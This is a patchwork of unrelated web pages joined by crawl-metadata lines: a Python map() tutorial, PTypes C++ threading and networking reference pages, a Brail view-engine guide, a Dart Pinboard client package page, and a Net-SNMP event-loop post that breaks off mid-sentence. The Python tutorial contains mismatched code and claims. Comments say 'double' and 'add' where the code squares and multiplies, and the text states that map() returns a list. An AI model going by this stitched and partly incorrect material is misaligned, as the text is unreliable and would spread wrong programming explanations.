Theoretically, applications written functionally will be more accessible to:
- You to code and use each function separately.
- You can debug and test specific functions without looking at the rest of the application.
- You should be aware of this because you will not be dealing with state changes throughout the curriculum.
Functional programming often represents data with lists, arrays, and other iterables and a collection of functions that operate on and alter it. There are at least three regularly used ways for processing data in a functional style:
- Mapping is applying a transformation function to an iterable to create a new one. The transformation function is called on each item in the original iterable to produce items in the new one.
- Filtering is the process of generating a new iterable by applying a predicate or a Boolean-valued function on an iterable. It is possible to Filter off any items in the original iterable that cause the predicate function to return false elements in the new iterable.
- Applying a reduction function to an iterable to obtain a single cumulative result is known as reducing.
However, the Python community demanded some functional programming features in 1993. They wanted the following:
- Anonymous functions
- A map() function – is a function that returns a map.
- filter() function- is a function that allows you to filter data.
- reduce() function- is a function that reduces the size of an object.
Thanks to a community member’s input, several functional features are introduced to the language. Map(), filter(), and reduce() are now essential components of Python’s functional programming paradigm.
This tutorial will cover one of these functional aspects, the built-in function map(). You’ll also learn to use list comprehensions and generator expressions to achieve the same map() functionality in a Pythonic and legible manner.
Introduction to Python’s map()
You can find yourself in a position where you need to conduct the same action on all of the items in an input iterable to create a new iterable. Using Python for the loop is the quickest and most popular solution to this problem. You may, however, solve this problem without needing an explicit loop by using map().
You’ll learn how the map() works and how to use it to process and change iterables without using a loop in the parts that follow.
map() cycles through the items of an input iterable (or iterables) and returns an iterator that results from applying a transformation function on each item. map() accepts a function object and an iterable (or several iterables) as parameters and returns an iterator that yields transformed objects on-demand, according to the documentation. In a loop, map() applies the function to each item in the iterable, returning a new iterator with modified objects on demand. Any Python function taking the same number of arguments as the number of iterables you send to the map() qualifies. Note that map()’s first argument is a function object, which implies you must pass the function without running it. That is, without the need for a parentheses pair.
The transformation function is the first input to map(). Put another way, it’s the function that turns each original item into a new (transformed) one. Even though the Python documentation refers to this argument function, it can be any Python callable. Built-in functions, classes, methods, lambda, and user-defined functions are all included.
map() is usually a mapping function because it maps every input iterables’ item to a new item in an output iterable; map() does this by applying a transformation function to each item in the input iterable.
The syntax is as follows:
map(fun, iter)
Python’s map() Parameters
fun: It’s a function that a map uses to pass each element of an iterable to. It’s iterable that has to be mapped. The map() function accepts one or more iterables.
Returns: After applying the supplied function to each item of a given iterable, returns a list of the results (list, tuple, etc.) The map() (map object) returned value can then be provided to functions like list() (to build a list) and set() (to construct a set).
Example 1: program demonstrating how the map() function works
# Return double of n def multiplication(n): return n * n # We double all numbers using map() num_vals = (3, 4, 5, 6) result = map(multiplication, num_vals) print(list(result))
Example 2: Using lambda expression to achieve the results in example 1
We can alternatively engage lambda expressions to achieve the above result with the map.
# Mulitply all numbers using map and lambda num_vals = (3, 4, 5, 6) result = map(lambda x: x * x, num_vals) print(list(result))
Example 3: Using lambda and map
# Add two lists using map and lambda num_vals_1 = [3, 4, 5] num_vals_2 = [6, 7, 8] result = map(lambda x, y: x * y, num_vals_1, num_vals_2) print(list(result))
Example 4: Using the map on lists
# List of strings laptops = ['HP', 'Dell', 'Apple', 'IBM'] # map() can listify the list of strings individually result = list(map(list, laptops)) print(result)
Example 5: Calculating every word’s length in the tuple:
def funcCalculatingStringLength(n): return len(n) result = map(funcCalculatingStringLength, ('Apple', 'HP', 'Chromebook')) print(result)
Using map() with various function types
With the map, you can use any Python callable (). The callable must take an argument and return a tangible and meaningful value as the only requirement. Classes, instances that implement a specific method called call(), instance methods, class methods, static methods, and functions, for example, can all be used.
The map has several built-in functions that you can use. Think about the following scenarios:
num_vals = [-4, -3, 0, 3, 4] abs_values = list(map(abs, num_vals)) abs_values list(map(float, num_vals)) word_lengths = ["Codeunderscored", "is","the" ,"Real", "Deal"] list(map(len, word_lengths))
Any built-in function is used with map() as long as it takes an argument and returns a value.
When it comes to utilizing map(), employing a lambda function as the first argument is typical. When passing expression-based functions to map(), lambda functions are helpful. For example, using a lambda function, you may re-implement the example of the square values as follows:
num_vals = [1, 2, 3, 4, 5] squared_vals = map(lambda num: num ** 2, num_vals) list(squared_vals)
Lambda functions are particularly beneficial for using map() (). They can be used as the first argument in a mapping (). You can quickly process and change your iterables using lambda functions with map().
Multiple input iterables processing using a map ()
If you send several iterables to map(), the transformation function must accept the same number of parameters. Therefore, each iteration of the map() passes one value from each iterable to the function as a parameter. The iteration ends when the shortest iterable is reached.
Take a look at the following example, which makes use of pow():
list_one = [6, 7, 8] list_two = [9, 10, 11, 12] list(map(pow, list_one, list_two))
pow() returns x to the power of y given two arguments, x, and y. Using several arithmetic operations, you can merge two or more iterables of numeric values with this technique. The final iterable is limited to the length of the shortest iterable, which in this case is first it. Here are a few examples of how lambda functions are used to do various math operations on multiple input iterables:
list(map(lambda a, b: a - b, [12, 14, 16], [11, 13, 15])) list(map(lambda p, q, r: p + q + r, [12, 14], [11, 13], [17, 18]))
To combine two iterables of three elements, you perform a subtraction operation in the first example. The values of three iterables are added together in the second case.
Transforming String Iterables using Python’s map()
When working with iterables of string objects, you might want to consider using a transformation function to transform all items. Python’s map() function can come in handy in some instances. The examples in the following sections will show you how to use map() to alter iterables of string objects.
Using the str Methods
Using some of the methods of the class str to change a given string into a new string is a typical technique for string manipulation. If you’re working with iterables of strings and need to apply the same transformation to each one, map() and related string methods can help:
laptops_companies = ["Microsoft", "Google", "Apple", "Amazon"] list(map(str.capitalize, laptops_companies)) list(map(str.upper, laptops_companies)) list(map(str.lower, laptops_companies))
You may use map() and string methods to make a few modifications on each item in string it. Most of the time, you’d use methods like str.capitalize(), str.lower(), str.swapcase(), str.title(), and str.upper() that don’t require any additional arguments .
You can also utilize methods that take optional parameters with default values, such str.strip(), which takes an optional argument called char and removes whitespace by default:
laptops_companies = ["Microsoft", "Google", "Apple", "Amazon"] list(map(str.strip, laptops_companies ))
A lambda function gives arguments rather than relying on the default value. When you use str.strip() in this way, you depend on the char’s default value. In this scenario, map() removes all whitespace from the with spaces elements. For example, when processing text files, this technique can come in helpful when you need to delete trailing spaces (or other characters) from lines. Keep in mind that removing the newline character with the str.strip() without a custom char will also delete the newline character on the off chance that this is the case.
Using map() in conjunction with other functional tools
So far, you’ve learned how to use map() to perform various iterable-related tasks. You can conduct more complex changes on your iterables if you use map() in conjunction with other functional tools like filter() and reduce(). That’s what the following sections are going to be about.
filter() and map()
You may need to process an input iterable and return another iterable due to removing undesired values from the input iterable. In that instance, Python’s filter() function would be a decent choice. The built-in function filter() accepts two positional arguments:
- function is a predicate or a Boolean-valued function, which returns True or False depending on the input data.
- Any Python iterable will be used as iterable.
Filter() utilizes the identity function if you pass None to function. It means that filter() will examine each item in iterable for its truth value and filter out any wrong things. The input iterables items’ for which filter() returns True is returned by filter().
Consider the following scenario: you need to calculate the square root of all the items in a list. You can use map() and filter() to accomplish this. Because the square root isn’t specified for negative numbers, you’ll get an error because your list potentially contains negative values:
import math math.sqrt(-25)
If the argument is a negative number, math.sqrt() throws a ValueError. To avoid this problem, use filter() to remove any negative numbers and then find the square root of the positive ones that remain. Consider the following scenario:
import math def chek_if_positive(val): return val >= 0 def sanitized_sqrt(nums): vals_cleaned = map(math.sqrt, filter(chek_if_positive, nums)) return list(vals_cleaned) sanitized_sqrt([64, 16, 49, -25, 4])
chek_if_positive() takes a number as an argument and returns True if the number is greater than or equal to zero. To remove all negative values from numbers, send chek_if_positive() to filter(). As a result, map() will only process positive values, and math.sqrt() will not throw a ValueError.
reduce() and map()
Reduce() in Python is a function found in the functools module of the Python standard library. reduce() is a crucial Python functionality that applies a function to an iterable and reduce it to a single cumulative value. Reduction or folding are terms used to describe this type of action. reduce() requires the following two arguments:
- Any Python callable that takes two arguments and returns a value qualifies as a function.
- Any Python iterable can be used as iterable.
reduce() will apply the function to all of the elements in the iterable and compute a final value cumulatively.
Here’s an example of how to use map() and reduce() to compute the total size of all the files in your home directory:
import functools as fn import operator import os import os.path code_files = os.listdir(os.path.expanduser("~")) fn.reduce(operator.add, map(os.path.getsize, code_files))
To acquire the path to your home directory, you use the os.path.expanduser(“~”) in this example. Then, on that path, you call os.listdir() to receive a list of all the files that live there.
os.path is used in the map() operation.
To determine the size of each file, use getsize(). To find the total size of all files, use the add() function. Finally, you utilize operator with reduce(). The final result is the home size’s directory in bytes.
Although reduce() can address the problem in this section, Python also has other tools that can help you develop a more Pythonic and efficient solution. To calculate the total size of the files in your home directory, for example, you can use the built-in function sum():
import os import os.path underscored_files = os.listdir(os.path.expanduser("~")) sum(map(os.path.getsize, underscored_files))
This example is significantly more readable and efficient than the previous one. You can look for further information on Python’s reduce(): From Functional to Pythonic Style, how to use reduce(), and which alternative tools you may use to replace it in a Pythonic fashion.
Processing Iterables(Tuple-Based) with starmap()
Python’s itertools have a function called starmap(). starmap() creates an iterator that applies a function to the arguments in a tuple iterable and returns the results. It comes in handy when working with iterables that have previously been grouped into tuples.
The primary difference between map() and starmap() is that the latter uses the unpacking operator () to unpack each tuple of arguments into many positional arguments before calling its transformation function. As a result, instead of function(arg1, arg2,… argN), the transformation function is called function(args).
According to the official documentation, starmap() is identical to the following Python function:
def starmap(function, iterable): for args in iterable: yield function(*args)
This function’s for loop iterates through the items in iterable, returning altered objects as a result. In the call to function(*args), the unpacking operator is used to unpack the tuples into many positional arguments. Examples of starmap():
from itertools import starmap list(starmap(pow, [(7, 12), (9, 8)]))
Conclusion
The map() function performs a specified function for each item in an iterable. The item is passed as a parameter to the function. The map() function in Python allows you to process and transform all elements in an iterable without using an explicit for loop, a technique known as mapping. When you need to apply a transformation function to each item in an iterable and change it into a new iterable, map() comes in handy. In Python, map() is one tool that supports functional programming.
You’ve learned how the map() works and how to use it to handle iterables in this tutorial. You also learned about several Pythonic utilities that you can use in your code to replace map(). | https://www.codeunderscored.com/maps-function-in-python-with-examples/ | CC-MAIN-2022-21 | en | refinedweb |
Top: Multithreading: trigger
#include <pasync.h> class trigger { trigger(bool autoreset, bool initstate); void wait(); void post(); void signal(); // alias for post() void reset(); }
Trigger is a simple synchronization object typically used to notify one or more threads about some event. Trigger can be viewed as a simplified semaphore, which has only two states and does not count the number of wait's and post's. Multiple threads can wait for an event to occur; either one thread or all threads waiting on a trigger can be released as soon as some other thread signals the trigger object. Auto-reset triggers release only one thread each time post() is called, and manual-reset triggers release all waiting threads at once. Trigger mimics the Win32 Event object.
trigger::trigger(bool autoreset, bool initstate) creates a trigger object with the initial state initstate. The autoreset feature defines whether the trigger object will automatically reset its state back to non-signaled when post() is called.
void trigger::wait() waits until the state of the trigger object becomes signaled, or returns immediately if the object is in signaled state already.
void trigger::post() signals the trigger object. If this is an auto-reset trigger, only one thread will be released and the state of the object will be set to non-signaled. If this is a manual-reset trigger, the state of the object is set to signaled and all threads waiting on the object are being released. Subsequent calls to wait() from any number of concurrent threads will return immediately.
void trigger::signal() is an alias for post().
void trigger::reset() resets the state of the trigger object to non-signaled.
See also: thread, mutex, rwlock, semaphore, Examples | http://www.melikyan.com/ptypes/doc/async.trigger.html | crawl-001 | en | refinedweb |
Top: Networking: ipstream
#include <pinet.h> class ipstream: instm, outstm { ipstream(); ipstream(ipaddress ip, int port); ipstream(string host, int port); ~ipstream(); void open(); void close(); void cancel(); bool waitfor(int milliseconds); ipaddress get/set_ip(); string get/set_host(); int get/set_port(); ipaddress get_myip(); int get_myport(); virtual void sockopt(int socket); }
The ipstream class implements full-duplex streaming communication between IP hosts. Ipstream incorporates iobase, instm and outstm interfaces and adds two more properties: peer IP address and peer port number. This means, you can work with ipstream the same way you work with infile and outfile, except that you specify the target IP address or the symbolic hostname along with the port number instead of the filename when constructing an object. Besides, the rules of object-oriented inheritance allow you to manipulate ipstream objects in those parts of your code which are only 'familiar' with the basic instm and outstm interfaces.
In order to open a connection and exchange data you need to set target (peer host) address and the port number. The peer address can be either a symbolic DNS name or a numeric IPv4 address. Regardless of which one of these two properties you set first, the ipstream object can perform DNS resolving as necessary and return both properties on your request.
Ipstream adds the following status codes: IO_RESOLVING, IO_RESOLVED, IO_CONNECTING, IO_CONNECTED (see also iobase for the status codes common to all streams).
On UNIX the library startup code blocks SIGPIPE, so that all error conditions on sockets always raise exceptions of type (estream*).
ipstream::ipstream() is the default constructor.
ipstream::ipstream(ipaddress ip, int port) constructs an ipstream object and assigns the peer ip/port values.
ipstream::ipstream(string host, int port) constructs an ipstream object and assigns the peer host name and port values. Before actually opening the stream ipstream resolves the host name to a numeric IP address. Host can be either a symbolic DNS name or even a numeric address in a string form (e.g. "somehost.com" or "192.168.1.1").
ipstream::~ipstream() cancels the connection immediately and destroys the object. To shut down the connection 'gracefully' you should call close() before destroying the object or before the program goes beyond the scope of a static/local ipstream object.
void ipstream::open() opens a connection with the peer. host or ip along with port properties must be set before opening the stream.
void ipstream::close() closes the stream 'gracefully', and in some situations may be time-consuming. Although all stream objects in PTypes are closed by the destructors automatically, it is recommended to explicitly call close() for socket objects.
void ipstream::cancel() closes the stream immediately. If the connection was successful, calling cancel() may leave the peer host in a waiting state for a long time.
bool ipstream::waitfor(int milliseconds) waits on the socket until either data is available for reading (returns true) or the time specified in the parameter has elapsed, in which case it returns false.
ipaddress ipstream::get/set_ip() sets/retrieves the peer address in a numerical form. If the object was constructed using a symbolic name, get_ip() may perform a DNS lookup (only once).
string ipstream::get/set_host() sets/retrieves the peer address in a symbolic form. If the object was constructed using a numeric IP address, get_host() may perform a reverse DNS lookup.
int ipstream::get/set_port() sets/retrieves the peer port number.
ipaddress ipstream::get_myip() returns the local address associated with the socket.
int ipstream::get_myport() returns the local port number associated with the socket.
virtual void ipstream::sockopt(int socket) - override this method in a descendant class if you want to set up additional socket options (normally, by calling setsockopt()).
See also: iobase, instm, outstm, ipstmserver, Utilities, Examples | http://www.melikyan.com/ptypes/doc/inet.ipstream.html | crawl-001 | en | refinedweb |
Top: Streams: Standard input, output and error devices
#include <pstreams.h> instm pin; outstm pout; outstm perr; outstm pnull;
PTypes declares four static stream objects for standard input, output, error and null devices - pin, pout, perr and pnull respectively. These objects can be used in place of the standard C or C++ input/output interfaces. Pnull is an output stream that discards any data written to it. The putf() method in standard output objects pout and perr is atomic with respect to multithreading.
See also: iobase, instm, outstm, Examples | http://www.melikyan.com/ptypes/doc/streams.stdio.html | crawl-001 | en | refinedweb |
Top: Multithreading: mutex
#include <pasync.h> class mutex { mutex(); void enter(); void leave(); void lock(); // alias for enter() void unlock(); // alias for leave() } class scopelock { scopelock(mutex&); ~scopelock(); }
Mutex (mutual exclusion) is another synchronization object which helps to protect shared data structures from being concurrently accessed and modified.
Accessing and changing simple variables like int concurrently can be considered safe provided that the variable is aligned on a boundary "native" to the given CPU (32 bits on most systems). More often, however, applications use more complex shared data structures which can not be modified and accessed at the same time. Otherwise, the logical integrity of the structure might be corrupt from the "reader's" point of view when some other process sequentially modifies the fields of a shared structure.
To logically lock the part of code which modifies such complex structures the thread creates a mutex object and embraces the critical code with calls to enter() and leave(). Reading threads should also mark their transactions with enter() and leave() for the same mutex object. When either a reader or a writer enters the critical section, any attempt to enter the same section concurrently causes the thread to "hang" until the first thread leaves the critical section.
If more than two threads are trying to lock the same critical section, mutex builds a queue for them and allows threads to enter the section only one by one. The order of entering the section is platform dependent.
To avoid infinite locks on a mutex object, applications usually put the critical section into try {} block and call leave() from within catch {} in case an exception is raised during the transaction. The scopelock class provides a shortcut for this construct: it automatically locks the specified mutex object in its constructor and unlocks it in the destructor, so that even if an exception is raised inside the scope of the scopelock object leave() is guaranteed to be called.
More often applications use a smarter mutual exclusion object called read/write lock -- rwlock.
PTypes' mutex object encapsulates either Windows CRITICAL_SECTION structure or POSIX mutex object and implements the minimal set of features common to both platforms. Note: mutex may not be reentrant on POSIX systems, i.e. a recursive lock from one thread may cause deadlock.
mutex::mutex() creates a mutex object.
void mutex::enter() marks the start of an indivisible transaction.
void mutex::leave() marks the end of an indivisible transaction.
void mutex::lock() is an alias for enter().
void mutex::unlock() is an alias for leave().
scopelock::scopelock(mutex& m) creates a scopelock object and calls enter() for the mutex object m.
scopelock::~scopelock() calls leave() for the mutex object specified during construction and destroys the scopelock object.
See also: thread, rwlock, trigger, semaphore, Examples | http://www.melikyan.com/ptypes/doc/async.mutex.html | crawl-001 | en | refinedweb |
User's Guide
A complete example
<html> <head> <title>${title}</title> </head> <body> <p>The following items are in the list:</p> <ul><%for element in list: output "<li>${element}</li>"%></ul> <p>I hope that you would like Brail</p> </body> </html>
The output of this program (assuming list is (1,2,3) and title is "Demo" ) would be:
<html> <head> <title>Demo</title> </head> <body> <p>The following items are in the list:</p> <ul><li>1</li><li>2</li><li>3</li></ul> </body> </html>
And the rendered HTML will look like this:
---- The following items are in the list: * 1 * 2 * 3 -----
Code Separators
Brail supports two code separators <% %> and <?brail ?>, I find that <% %> is usually easier to type, but <?brail ?> allows you to have valid XML in the views, which is important for some use cases. Anything outside a <?brail ?> or <% %> is sent to the output. ${user.Id} can be used for string interpolation.
The code separator types cannot be mixed. Only one type of separators must be used per file.
Output methods
Since most of the time you will want to slice and dice text to serve the client, you need some special tools to aid you in doing this. Output methods* are methods that are decorated by [Html] / [Raw] / [MarkDown] attributes. An output method return value is transformed according to the specified attribute that has been set on it, for instance, consider the [Html] attribute:
<% [Html] def HtmlMethod(): return "Some text that will be <html> encoded" end %> ${HtmlMethod()}
The output of the above script would be:
Some text that will be <html> encoded
The output of a method with [Raw] attribute is the same as it would've without it (it's supplied as a NullObject for the common case) but the output of the MarkDown attribute is pretty interesting. Here is the code:
<% [MarkDown] def MarkDownOutput(): return "[Ayende Rahien](), __Rahien__." end %> ${MarkDownOutput()}
And here is the output:
<p><a href="">Ayende Rahien</a>, <strong>Rahien</strong>.</p>
Markdown is very interesting and I suggest you read about its usage.
Using variables
A controller can send the view variables, and the Boo script can reference them very easily:
My name is ${name} <ul> <% for element in list: output "<li>${element}</li>" end %> </ul>
Brail has all the normal control statements of Boo, which allows for very easy way to handle such things as:
<% output AdminMenu(user) if user.IsAdministrator %>
This will send the menu to the user only if he is administrator.
One thing to note about this is that we are taking the variable name and trying to find a matching variable in the property bag that the controller has passed. If the variable does not exist, this will cause an error, so pay attention to that. You can test that a variable exists by calling the IsDefined() method.
<% if IsDefined("error"): output error end %>
Or, using the much clearer syntax of "?variable" name:
<% output ?error %>
The syntax of "?variable" name will return an IgnoreNull proxy, which can be safely used for null propagation, like this:
<% # will output an empty string, and not throw a null reference exception output ?error.Notes.Count %>
This feature can make it easier to work with optional parameters, and possible null properties. Do note that it will work only if you get the parameter from the property bag using the "?variableName" syntax. You can also use this using string interpolation, like this:
Simple string interpolation: ${?error} And a more complex example: ${?error.Notes.Count}
In both cases, if the error variable does not exists, nothing will be written to the output.
Using sub views
There are many reasons that you may want to use a sub view in your views and there are several ways to do that in Brail. The first one is to simply use the common functionality. This gives a good solution in most cases (see below for a more detailed discussion of common scripts).
The other ways is to use a true sub view, in Brail, you do that using the OutputSubView() method:
Some html <?brail OutputSubView("/home/menu")?> <br/>some more html
You need to pay attention to two things here:
The rules for finding the sub view are as followed:
- If the sub view start with a '/' : then the sub view is found using the same algorithm you use for RenderView()
- If the sub view doesn't start with a '/' : the sub view is searched starting from the ''current script'' directory.
A sub view inherit all the properties from its parent view, so you have access to anything that you want there.
You can also call a sub view with parameters, like you would call a function, you do it like this:
<?brail OutputSubView("/home/menu", { "var": value, "second_var": another_value } ) ?>
Pay attention to the brackets, what we have here is a dictionary that is passed to the /home/menu view. From the sub view itself, you can just access the variables normally. This variables, however, are not inherited from views to sub views.
Including files
Occasionally a need will arise to include a file "as-is" in the output, this may be a script file, or a common html code, and the point is not to interpret it, but simply send it to the user. In order to do that, you simply need to do this:
${System.IO.File.OpenText("some-file.js").ReadToEnd()}
Of course, this is quite a bit to write, so you can just put an import at the top of the file and then call the method without the namespace:
<% import System.IO %> ${File.OpenText("some-file.js").ReadToEnd()}
Principle of Least Surprise
On general, since NVelocity is the older view engine for now, I have tried to copy as much behavior as possible from NVelocityViewEngine. If you've a question about how Brail works, you can usually rely on the NVelocity behavior. If you find something different, that is probably a bug, so tell us about it.
Common Functionality
In many cases, you'll have common functionality that you'll want to share among all views. Just drop the file in the CommonScripts directory - (most often, this means that you will drop your common functionality to Views\CommonScripts) - and they will be accessible to any script under the site.
The language used to write the common scripts is the white space agnostic deriative of Boo, and not the normal one. This is done so you wouldn't have white spacing sensitivity in one place and not in the other.
The common scripts are normal Boo scripts and get none of the special treatment that the view scripts gets. An error in compiling one of the common scripts would cause the entire application to stop.
Here is an example of a script that sits on the CommonScripts and how to access it from a view:
Views\CommonScripts\SayHello.boo - The common script
def SayHello(name as string): return "Hello, ${name}" end
Views\Home\HelloFromCommon.boo - The view using the common functionality
<% output SayHello("Ayende") %>
The output from the script:
Hello, Ayende
Symbols and dictionaries
Quite often, you need to pass a string to a method, and it can get quite cumbersome to understand when you have several such parameters. Brail support the notion of symbols, which allows to use an identifier when you need to pass a string. A symbol is recognized by a preceding '@' character, so you can use this syntax:
<% output SayHello( @Ayende ) %>
And it will work exactly as if you called SayHello( "Ayende" ). The difference is more noticable when you take into account methods that take components or dictionary parameters, such as this example:
<% component Grid, {@source: users, @columns: [@Id, @Name] } %>
Using a symbol allows a much nicer syntax than using the string alternative:
<% component Grid, {"source: users, "columns": ["Id", "Name"] } %>
Layouts
Using layouts is very easy, it is just a normal script that outputs ChildOutput property somewhere, here is an example:
Header ${ChildOutput} Footer | http://www.castleproject.org/monorail/documentation/trunk/viewengines/brail/usersguide.html | crawl-001 | en | refinedweb |
setcchar - set cchar_t from a wide character string and rendition
#include <curses.h> int setcchar(cchar_t *wcval, const wchar_t *wch, const attr_t attrs, short color_pair, const void *opts);
The setcchar() function initialises the object pointed to by wcval according to the character attributes in attrs, the colour pair in color_pair and the wide character string pointed to by wch.
The opts argument is reserved for definition in a future edition of this document. Currently, the application must provide a null pointer as opts.
Upon successful completion, setcchar() returns OK. Otherwise, it returns ERR.
No errors are defined.
Characters, attroff(), can_change_color(), getcchar(), <curses.h>. | http://www.opengroup.org/onlinepubs/007908799/xcurses/setcchar.html | crawl-001 | en | refinedweb |
pinboard 1.1.1
Pinboard for Dart #
A library that provides a nice interface to communicate with the Pinboard API. The library is essentially a typed wrapper to Pinboard's API, meaning that it sometimes does things that don't quite make sense. Blame Pinboard.
Usage #
You can view a complete example of the available API in the example. You can also view the documentation, although it's a little verbose.
1.1.1 #
- Fix issue with posts that have no tags returning an array with an empty string
1.1.0 #
- Added errors from the Pinboard API
1.0.0 #
- Initial version, created by Stagehand
example/pinboard_example.dart
import 'package:pinboard/pinboard.dart'; main() async { var client = Pinboard(username: 'test'); await client.loginWithPassword(password: 'password123'); // You can also create a client with a token if you happen to have one. // var client = Pinboard(username: 'dstaley', token: 'rubbadubdub'); // Posts // Returns the most recent time a bookmark was added, updated or deleted. var lastUpdate = await client.posts.update(); // Add a bookmark. var addPostResponse = await client.posts.add( url: '', description: 'Download Firefox — Free Web Browser — Mozilla', extended: 'The last remaining non-corporate web browser', tag: 'web-browser software open-source', dt: DateTime.parse('2018-12-25'), replace: false, shared: true, toread: false, ); // Delete a bookmark. var deletePostResponse = await client.posts.delete( url: '', ); // Returns one or more posts on a single day matching the arguments. If no // date or url is given, date of most recent bookmark will be used. var filteredPosts = await client.posts.get( tag: 'software', dt: DateTime.parse('2018-12-25'), url: '', meta: true, ); // Returns a list of the user's most recent posts, filtered by tag. var recentPosts = await client.posts.recent( tag: 'software', count: 5, ); // Returns a list of the user's most recent posts, filtered by tag. var dates = await client.posts.dates( tag: 'software', ); // Returns all bookmarks in the user's account. var allPosts = await client.posts.all( tag: 'software', start: 10, results: 5, fromdt: DateTime.parse('2018-01-01'), todt: DateTime.parse('2018-12-31'), meta: 1, ); // Returns a list of popular tags and recommended tags for a given URL. // Popular tags are tags used site-wide for the url; recommended tags are // drawn from the user's own tags. var suggestedTags = await client.posts.suggest( url: '', ); // Tags // Returns a full list of the user's tags along with the number of times they // were used. var allTags = await client.tags.get(); // Delete an existing tag. var deleteTagResponse = await client.tags.delete( tag: 'software', ); // Rename an tag, or fold it in to an existing tag. var renameTagResponse = await client.tags.rename( old: 'open-source', new_: 'opensource', ); // User // Returns the user's secret RSS key (for viewing private feeds). var secret = await client.user.secret(); // Returns the user's API token (for making API calls without a password). var apiToken = await client.user.api_token(); // Notes // Returns a list of the user's notes. var allNotes = await client.notes.list(); // Returns an individual user note. var note = await client.notes.get(id: '14b66dd2cd8b7d70f1d1'); }
Use this package as a library
1. Depend on it
Add this to your package's pubspec.yaml file:
dependencies: pinboard: board/pinboard.dart';
We analyzed this package on Jan 16, 2020, and provided a score, details, and suggestions below. Analysis was completed with status completed using:
- Dart: 2.7.0
- pana: 0.13.2
Health suggestions
Fix
lib/src/pinboard_base.dart. (-6.31 points)
Analysis of
lib/src/pinboard_base.dart reported 13 hints, including:
line 32 col 5: Don't access members with
this unless avoiding shadowing.
line 41 col 11: Don't access members with
this unless avoiding shadowing.
line 42 col 5: Don't access members with
this unless avoiding shadowing.
line 42 col 18: Don't access members with
this unless avoiding shadowing.
line 47 col 5: Prefer using
??= over testing for null.
Fix
lib/src/pinboard_posts.dart. (-6.31 points)
Analysis of
lib/src/pinboard_posts.dart reported 13 hints, including:
line 66 col 10: Annotate overridden members.
line 111 col 10: Annotate overridden members.
line 149 col 10: Annotate overridden members.
line 179 col 10: Annotate overridden members.
line 206 col 10: Annotate overridden members.
Fix
lib/src/pinboard_client.dart. (-1.99 points)
Analysis of
lib/src/pinboard_client.dart reported 4 hints:
line 28 col 8: Don't access members with
this unless avoiding shadowing.
line 28 col 22: Prefer using if null operators.
line 43 col 5: Don't access members with
this unless avoiding shadowing.
line 46 col 10: Annotate overridden members.
Fix additional 4 files with analysis or formatting issues. (-5.48 points)
Additional issues in the following files:
lib/src/pinboard_notes.dart(4 hints)
lib/src/pinboard_tags.dart(3 hints)
lib/src/pinboard_shared.dart(2 hints)
lib/src/pinboard_user.dart(2 hints)
Maintenance suggestions
Package is getting outdated. (-5.21 points)
The package was last published 54 weeks ago. | https://pub.dev/packages/pinboard | CC-MAIN-2020-05 | en | refinedweb |
Integration of Net-SNMP into an event loop
Vincent Bernat
Net-SNMP comes with its own event loop based on the
system call. While you can build your program around it, you may
prefer to use an existing event loop, either a custom one or something
like libevent, libev or Twisted.
Own custom event loop#
Let’s start with the easiest case: you have written your own event
loop. This means you make a call to
poll(),
epoll(),
kqueue() or something similar. All these functions take a set of
file descriptors and wait for any of them to become available in a
specified time frame.
Here is a typical use of
select() (adapted from Quagga)
readfd = m->readfd; writefd = m->writefd; exceptfd = m->exceptfd; timer_wait = thread_timer_wait (&m->timer); num = select (FD_SETSIZE, &readfd, &writefd, &exceptfd, timer_wait); if (num < 0) { if (errno == EINTR) continue; /* signal received - process it */ zlog_warn ("select() error: %s", safe_strerror (errno)); return NULL; } if (num == 0) { /* Timeout handling */ thread_timer_process (&m->timer); } if (num > 0) { thread_process_fd (&readfd); thread_process_fd (&writefd); }
thread_process_fd (fds) function iterates on each file descriptor
fd and executes the appropriate action if
FD_ISSET (fds, fd) is
true.
Integrating Net-SNMP into such an event loop is easy: Net-SNMP
provides the
snmp_select_info() function which alters a set of file
descriptors to insert its own. Here is the new code:
#if defined HAVE_SNMP struct timeval snmp_timer_wait; int snmpblock = 0; int fdsetsize; #endif /* ... */ #if defined HAVE_SNMP fdsetsize = FD_SETSIZE; snmpblock = 1; if (timer_wait) { snmpblock = 0; memcpy(&snmp_timer_wait, timer_wait, sizeof(struct timeval)); } snmp_select_info(&fdsetsize, &readfd, &snmp_timer_wait, &snmpblock); if (snmpblock == 0) timer_wait = &snmp_timer_wait; #endif num = select (FD_SETSIZE, &readfd, &writefd, &exceptfd, timer_wait); if (num < 0) { /* ... */ } #if defined HAVE_SNMP if (num > 0) snmp_read(&readfd); else if (num == 0) { snmp_timeout(); run_alarms(); } netsnmp_check_outstanding_agent_requests(); #endif /* ... */
snmp_select_info() may modify the provided set of file descriptors
(and therefore, its size). It may also modify the provided timer in
case it needs to schedule an action before the original timeout.
snmpblock is a tricky variable. While
select() can be called with
a timeout set to
NULL, this is not the case for
snmp_select_info():
you have to pass a valid pointer.
snmpblock is set to 0 if the
provided timeout must be considered or to 1
otherwise.
snmp_select_info() will set
snmpblock to 0 if and only
if it alters the timeout.
Here are a three examples of integration. They are for a subagent but the code for a manager is the same:
Third-party event loop#
With a third party event loop, you don’t have access to the
system call anymore. Therefore, you cannot alter it with
snmp_select_info(). Instead, at each iteration of the loop, a list
of SNMP related file descriptors is kept up-to-date with the help of
snmp_select_info(): new ones are added and old ones are removed.
libevent#
Let’s assume that
snmp_fds is the list of current SNMP related
events.1 A function
levent_snmp_update() calls
snmp_select_info() to update this list. Here is a partial
implementation (error handling removed and some declarations omitted,
look at the
complete version
from lldpd):
static void levent_snmp_update() { int maxfd = 0; int block = 1; FD_ZERO(&fdset); snmp_select_info(&maxfd, &fdset, &timeout, &block); /* We need to untrack any event whose FD is not in `fdset` anymore */ for (snmpfd = TAILQ_FIRST(snmp_fds); snmpfd; snmpfd = snmpfd_next) { snmpfd_next = TAILQ_NEXT(snmpfd, next); if (event_get_fd(snmpfd->ev) >= maxfd || (!FD_ISSET(event_get_fd(snmpfd->ev), &fdset))) { event_free(snmpfd->ev); TAILQ_REMOVE(snmp_fds, snmpfd, next); free(snmpfd); } else FD_CLR(event_get_fd(snmpfd->ev), &fdset); } /* Invariant: FD in `fdset` are not in list of FD */ for (int fd = 0; fd < maxfd; fd++) if (FD_ISSET(fd, &fdset)) { snmpfd->ev = event_new(base, fd, EV_READ | EV_PERSIST, levent_snmp_read, NULL); event_add(snmpfd->ev, NULL); TAILQ_INSERT_TAIL(snmp_fds, snmpfd, next); } /* If needed, handle timeout */ evtimer_add(snmp_timeout, block?NULL:&timeout); }
Then, replace the main loop (usually, a call to
event_base_dispatch()) with this:
